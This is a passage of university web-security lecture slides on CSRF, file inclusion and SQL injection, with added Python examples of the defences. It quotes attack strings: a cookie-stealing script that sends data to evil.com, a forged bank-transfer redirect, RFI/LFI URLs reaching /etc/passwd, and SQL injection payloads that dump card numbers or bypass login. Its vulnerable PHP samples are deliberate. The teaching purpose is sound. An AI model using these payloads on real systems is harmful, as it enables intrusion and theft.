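An added example in Python, not code from the lecture: it applies the slides' "strip out all <script> tags" filter to the URL-encoded request of slide 54, once before and once after URL decoding, and contrasts both with HTML output encoding (html.escape), which neutralizes the reflected payload of slide 52 without having to enumerate dangerous tags. The render_* function names and the "Search results for ... is ..." page text are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Payloads quoted on the slides (copied here as constructed test inputs).
ENCODED_PAYLOAD = "%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2Fscript%3E"
COOKIE_PAYLOAD = ('<script> document.location="http://evil.com/steal.php?cookie="'
                  '+document.cookie </script>')

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def strip_script_tags(text: str) -> str:
    """The slide's countermeasure: a blacklist that deletes <script> tags."""
    return SCRIPT_TAG.sub("", text)


def render_filtered_raw(raw_query: str) -> str:
    """Filter applied to the raw, still URL-encoded parameter, after which the
    application decodes it: the encoded payload passes through untouched."""
    return "Search results for " + unquote(strip_script_tags(raw_query)) + " is ..."


def render_filtered_decoded(raw_query: str) -> str:
    """Same blacklist applied after decoding: catches this payload, but still
    only catches what the blacklist enumerates."""
    return "Search results for " + strip_script_tags(unquote(raw_query)) + " is ..."


def render_escaped(raw_query: str) -> str:
    """Output encoding: decode, then escape for an HTML text context. The
    browser displays the payload as text and never parses a tag from it."""
    return "Search results for " + html.escape(unquote(raw_query), quote=True) + " is ..."


def contains_html_tag(rendered: str) -> bool:
    """Detection helper for tests and response scanning: is a raw tag left?"""
    return re.search(r"<[a-zA-Z/]", rendered) is not None
```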
Cross-Site Request Forgery (CSRF)
Basic idea:
1 Alice has an account with www.bob.com.
2 www.bob.com trusts Alice.
3 Alice is authenticated with www.bob.com (through an active cookie, for example).
4 Alice visits a site www.evil.com.
5 www.evil.com executes a malicious script on www.bob.com (who thinks he's talking to Alice!).
I.e. in a CSRF attack a website executes commands it received from a user it trusts.
Attacks on Clients 56/79
Cross-Site Request Forgery (CSRF). . .
Alice is logged into her bank www.bank.com, her authentication stored in a cookie.
She visits www.evil.com that has this script:
```html
<script>
document.location="http://bank.com/transfer.php?amount=1000&from=Alice&to=Eve";
</script>
```
Alice's browser redirects to her bank which executes the transfer.
Attacks on Clients 57/79
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of the user, but makes the user authenticate as the attacker.
Example:
1 Alice orders cookies from evescookies.com.
2 Alice logs into paypal.com to pay for the cookies.
3 But, Eve has injected code that makes Alice authenticate to PayPal as Eve.
4 Alice gives paypal.com her credit card number.
5 Eve logs in to paypal.com to collect Alice's credit card number.
Attacks on Clients 58/79
Cross-Site Request Forgery — Login Attack. . .
(Figure: message sequence between Alice, evescookies.com and paypal.com, in order: "buy cookies!" (Alice to evescookies.com); "script: user=eve, pw=cookies" (evescookies.com to Alice's browser); "pay for cookies!" (Alice to evescookies.com); "login: user=eve, pw=cookies" (Alice's browser to paypal.com); "VISA=4750..." (Alice to paypal.com); "login" (Eve to paypal.com); "VISA=4750..." (paypal.com to Eve).)
Attacks on Clients 59/79
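As an added example (not code from the lecture), a minimal Python version of the bank's transfer endpoint from slide 57 with the two standard CSRF defences: state changes are accepted only on POST, and every request must carry a per-session synchronizer token that www.evil.com cannot read because of the same-origin policy. SESSIONS, handle_transfer and the hidden field name csrf are assumed names; the forged URL is the one on the slide.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# The forged request from slide 57 (www.evil.com redirects Alice's browser here).
FORGED_URL = "http://bank.com/transfer.php?amount=1000&from=Alice&to=Eve"

# Server-side session store (constructed stand-in): session id -> user + CSRF token.
SESSIONS = {}


def new_session(user):
    """Log `user` in: the session id becomes the cookie value, and the token is
    embedded by the bank in its own transfer form as a hidden field."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(32)}
    return sid


def csrf_token(sid):
    """Token the bank's own form carries for this session."""
    return SESSIONS[sid]["csrf"]


def params_from_url(url):
    """Flatten the query string of a URL such as FORGED_URL into a dict."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def handle_transfer(sid, method, params):
    """transfer.php with defences. `sid` is the session cookie the browser
    attached (None if absent), `params` the request parameters."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    if method != "POST":
        # A document.location redirect or an image load from evil.com can only
        # produce a GET, so a state-changing action never accepts one.
        return 405, "transfers must be POSTed"
    token = params.get("csrf", "")
    if not hmac.compare_digest(token, session["csrf"]):
        # evil.com cannot read bank.com's page, hence cannot learn the token;
        # a forged request arrives without it (or with a token from another session).
        return 403, "missing or invalid CSRF token"
    # The sender is taken from the session, never from a "from=" parameter.
    return 200, f"{session['user']} sent {int(params['amount'])} to {params['to']}"
```

The same check on the login form, with a token issued to the not-yet-logged-in session, stops the login attack of slides 58 and 59, because Eve's injected credentials arrive without it.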
Attacks on Servers
Server-side scripts execute code on the server to generate dynamic pages.
Written in php, perl, Java Servlets, . . . .
Access databases, . . . .
Attacks on Servers 61/79
Generating Dynamic Content
(Figure: message sequence between Alice, php and mysql, in order: "connect" (php to mysql); "<html>...</html>" (php to Alice); "name=Alice,pw=love" (Alice to php); "SELECT..." (php to mysql); "data" (mysql to php); "<html>...</html>" (php to Alice).)
Attacks on Servers 62/79
PHP
<?php insert code here ?>.
$_GET[variable] — array of GET input variables.
No typing.
```php
<HTML><BODY>
Your number: <?php echo $x=$_GET['number']; ?>. Square is <?php $y=$x*$x; echo $y; ?>.
</BODY></HTML>
```
Attacks on Servers 63/79
PHP. . .
Assume the GET variable number is 5, then PHP will generate this page:
```html
<HTML><BODY>
Your number: 5. Square is 25.
</BODY></HTML>
```
Attacks on Servers 64/79
Remote File Inclusion (RFI)
Let this be index.php:
```php
<?php
include("header.html");
include($_GET['page'] . ".php");   // the page name comes straight from the URL
include("footer.html");
?>
```
A user can go to www.cnn.com/index.php?page=news and a news page is generated. An attacker can go to
```
http://cnn.com/index.php?page=http://evil.com/evilcode
```
forcing the server to include and execute the remote file evilcode.php.
Most sites now forbid RFI.
Attacks on Servers 65/79
Local File Inclusion (LFI)
As RFI, but a local file gets executed:
```
http://www.cnn.com/index.php?page=secretpage
```
Getting the password file:
```
http://www.cnn.com/index.php?page=/etc/passwd%00
```
%00 is a null byte, effectively removing the .php extension.
Attacks on Servers 66/79
Local File Inclusion (LFI). . .
Attack: The attacker
1 uploads a file (a php script hiding as a .jpg file, for example).
2 tricks the site to execute the uploaded file using LFI.
(Figure: Eve uploads boat.jpg, whose content is `<?php ... ?>`, to flicker.com, then requests flicker.com/index.php?page=pics/boat.jpg.)
Attacks on Servers 67/79
Local File Inclusion (LFI). . .
For example, Jasvir Nagra's Visualize program
http://search.cpan.org/~jnagra/Perl-Visualize-1.02/Visualize.pm
can embed a perl script into a gif file, so that the file is both an image and an executable program.
Attacks on Servers 68/79
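An added Python example, not the lecture's PHP: a resolver for the page parameter of index.php that performs the checks the slide's include() lacks, rejecting the RFI and LFI inputs shown above (a remote URL, the %00 null byte, /etc/passwd, pics/boat.jpg, directory traversal) and returning a reason string suitable for logging. PAGE_DIR, ALLOWED_PAGES and resolve_page are assumed names.

```python
import os
from urllib.parse import unquote, urlsplit

PAGE_DIR = "/var/www/pages"                    # assumed directory of includable pages
ALLOWED_PAGES = {"news", "sports", "weather"}  # assumed allow-list of page names


def resolve_page(raw_page, page_dir=PAGE_DIR):
    """Map the ?page= parameter to a file path under page_dir.

    Returns (path, "ok") or (None, reason). The allow-list is the primary
    control; the remaining checks give precise reasons for logging and act as
    defence in depth if the allow-list is later generated from the directory.
    """
    page = unquote(raw_page)
    if "\x00" in page:
        return None, "null byte"              # the %00 extension-dropping trick
    if urlsplit(page).scheme:
        return None, "remote URL"             # RFI: page=http://evil.com/evilcode
    if page not in ALLOWED_PAGES:
        return None, "not an allowed page"    # LFI: /etc/passwd, pics/boat.jpg, ../
    path = os.path.normpath(os.path.join(page_dir, page + ".php"))
    # The canonical path must still lie inside page_dir.
    if os.path.commonpath([path, page_dir]) != page_dir:
        return None, "escapes page directory"
    return path, "ok"
```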
Accessing a Backend Database
(Figure: message sequence between Alice, php and mysql, in order: "name=Alice,pw=love" (Alice to php); "SELECT..." (php to mysql); "data" (mysql to php).)
Attacks on Servers 69/79
SQL tables
SQL databases store records as tables:

| id | title      | author | body    |
|----|------------|--------|---------|
| 1  | Databases  | John   | Story 1 |
| 2  | Computers  | Joe    | Story 2 |
| 3  | Security   | Jane   | Story 3 |
| 4  | Technology | Julia  | Story 4 |
Attacks on Servers 70/79
SQL commands
SQL commands for accessing a relational database:

| Command | Effect                                  |
|---------|-----------------------------------------|
| SELECT  | extract records from tables             |
| INSERT  | insert new records in a table           |
| UPDATE  | alter a record in a table               |
| DELETE  | remove a record from a table            |
| UNION   | combine the results of multiple queries |
Attacks on Servers 71/79
SQL queries

| id | title      | author | body    |
|----|------------|--------|---------|
| 1  | Databases  | John   | Story 1 |
| 2  | Computers  | Joe    | Story 2 |
| 3  | Security   | Jane   | Story 3 |
| 4  | Technology | Julia  | Story 4 |

```sql
SELECT * FROM news WHERE id = 3
SELECT body FROM news WHERE author = "joe"
```
Attacks on Servers 72/79
SQL Injection Attack
```php
<?php
// The id parameter is concatenated straight into the query (the vulnerability).
$query = 'SELECT * FROM news WHERE id=' . $_GET['id'];
$out = mysql_query($query);
echo "<ul>";
while ($row = mysql_fetch_array($out)) {
    echo "<li>" . $row['id'];
    echo "<li>" . $row['title'];
    echo "<li>" . $row['author'];
    echo "<li>" . $row['body'];
}
echo "</ul>";
?>
```
Attacks on Servers 73/79
SQL Injection Attack. . .
Consider this URL:
```
http://www.cnn.com/news.php?id=3
```
The query would
1 extract the 3rd news article,
2 generate an HTML page, and
3 send it to the user.
Attacks on Servers 74/79
SQL Injection Attack. . .
Consider instead
```
http://www.cnn.com/news.php?id=NULL UNION SELECT cardno, first, last, email FROM users
```
Since the PHP code is
```php
<?php
$query = 'SELECT * FROM news WHERE id=' . $_GET['id'];
...
?>
```
this would force the server to execute
```sql
SELECT * FROM news WHERE id=NULL UNION SELECT cardno, first, last, email FROM users
```
revealing all account information.
Attacks on Servers 75/79
SQL Injection — Bypassing Authentication
Consider this server-side login script:
```php
<?php
// Email and password hash are pasted into the query text (the vulnerability).
$query = 'SELECT * FROM users WHERE email="' . $_POST['email'] . '" ' .
         'AND pwdhash="' . hash('sha256', $_POST['password']) . '"';
$out = mysql_query($query);
if (mysql_num_rows($out) > 0) {
    echo "Login successful!";
} else {
    $access = false;
    echo "Login failed";
}
?>
```
Attacks on Servers 76/79
SQL Injection — Bypassing Authentication
Let the attacker enter this into the login form:
```
email="OR 1=1;--
password=(empty)
```
Then, the original query
```php
'SELECT * FROM users WHERE email="' . $_POST['email'] . '" ' . 'AND pwdhash="' . hash('sha256', $_POST['password']) . '"'
```
turns into
```sql
SELECT * FROM users WHERE email=""OR 1=1; -- AND pwdhash = ...
```
Note that -- is PHP's comment character.
The query returns the entire user table to the attacker.
Attacks on Servers 77/79
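An added example, not the lecture's PHP, that runs both injections of slides 75 and 77 against an in-memory SQLite copy of the news table plus a constructed users table, next to the parameterized queries that defeat them; the `--` that ends the login payload is the SQL line-comment marker, so everything after it (the pwdhash condition) is ignored. Because SQLite treats double quotes as identifiers, the example builds its string literals with single quotes and adapts the login payload to `' OR 1=1 --`; the first/last columns are renamed firstname/lastname, and all names, e-mail addresses and card numbers are constructed.

```python
import hashlib
import sqlite3

# Payloads from the slides, adapted to single-quoted SQL string literals.
UNION_PAYLOAD = "NULL UNION SELECT cardno, firstname, lastname, email FROM users"
LOGIN_PAYLOAD = "' OR 1=1 --"


def sha256_hex(password: str) -> str:
    """Same hashing the slide's PHP does with hash('sha256', ...)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory copy of the lecture's news table plus a users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, author TEXT, body TEXT);
        INSERT INTO news VALUES (1,'Databases','John','Story 1'),
                                (2,'Computers','Joe','Story 2'),
                                (3,'Security','Jane','Story 3'),
                                (4,'Technology','Julia','Story 4');
        CREATE TABLE users(cardno TEXT, firstname TEXT, lastname TEXT,
                           email TEXT, pwdhash TEXT);
    """)
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        ("4750-0000-0000-0001", "Alice", "Smith", "alice@example.com", sha256_hex("love")),
        ("4750-0000-0000-0002", "Bob", "Jones", "bob@example.com", sha256_hex("hunter2")),
    ])
    return db


def news_vulnerable(db, id_param: str):
    """news.php as on slide 73: the parameter is pasted into the SQL text."""
    query = "SELECT * FROM news WHERE id=" + id_param
    return db.execute(query).fetchall()


def news_safe(db, id_param: str):
    """Validate the shape of the input, then bind it as a parameter so the
    database engine never parses it as SQL."""
    if not id_param.isdigit():
        return []
    return db.execute("SELECT * FROM news WHERE id=?", (int(id_param),)).fetchall()


def login_vulnerable(db, email: str, password: str) -> bool:
    """Login script of slide 76, with string concatenation."""
    query = ("SELECT * FROM users WHERE email='" + email
             + "' AND pwdhash='" + sha256_hex(password) + "'")
    return len(db.execute(query).fetchall()) > 0


def login_safe(db, email: str, password: str) -> bool:
    """Same check with bound parameters: the payload is compared as data."""
    rows = db.execute("SELECT * FROM users WHERE email=? AND pwdhash=?",
                      (email, sha256_hex(password))).fetchall()
    return len(rows) > 0
```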
Summary 78/79
Readings and References
Chapter 7 in Introduction to Computer Security, by Goodrich and Tamassia.
Summary 79/79